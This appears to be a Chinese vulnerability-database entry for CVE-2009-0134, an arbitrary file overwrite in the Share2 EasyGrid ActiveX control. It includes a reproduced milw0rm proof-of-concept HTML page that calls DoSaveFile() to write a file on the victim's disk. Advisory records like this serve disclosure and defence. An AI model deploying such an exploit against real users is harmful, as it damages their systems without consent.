Share2 Easy Grid ActiveX控件任意文件覆盖漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117234 漏洞类型 其他
发布时间 2009-01-14 更新时间 2009-01-29
CVE编号 CVE-2009-0134 CNNVD-ID CNNVD-200901-197
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/7779
https://cxsecurity.com/issue/WLB-2009010165
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-197
|漏洞详情
EasyGridActiveX控件是用于打印、预览表格、图标、公式、表达式的工具。EasyGrid.SGCtrl.32ActiveX控件(EasyGrid.ocx)没有安全地调用DoSaveFile()方式,如果用户受骗访问了恶意网页并向该方式传送了特制参数的话,就会导致向用户系统写入任意文件。
|漏洞EXP
=======================================================================================<br>
Author: Houssamix								       <br>
=======================================================================================<br>
- Viva Gazza - Viva Palestine - 						       <br>
AAA EasyGrid ActiveX  v 3.51 Remote File Overwrite exploit			       <br>
Download : http://www.share2.com/easygrid/download.htm		 		       <br>

 Tested on Windows XP Professional SP2 , with Internet Explorer 6		       <br>

Note : DoSaveHtmlFile() is vuln to , it well overwitten the file with some html code   <br>
=======================================================================================<br>
<HTML>
<BODY>
 <object id=hsmx classid="clsid:{DD44C0EA-B2CF-31D1-8DD3-444553540000}"></object>

<SCRIPT>

function hehe()
 {
     File = "c:\\hsmx.txt"
   hsmx.DoSaveFile(File)
 }

</SCRIPT>
<input language=JavaScript onclick=hehe() type=button value="execute exploit"><br>
</body>
</HTML>
=======================================================================================

# milw0rm.com [2009-01-14]
|参考资料

来源:XF
名称:easygrid-activex-dosavefile-file-overwrite(47946)
链接:http://xforce.iss.net/xforce/xfdb/47946
来源:BID
名称:33272
链接:http://www.securityfocus.com/bid/33272
来源:MILW0RM
名称:7779
链接:http://www.milw0rm.com/exploits/7779
来源:SREASON
名称:4913
链接:http://securityreason.com/securityalert/4913
来源:SECUNIA
名称:33537
链接:http://secunia.com/advisories/33537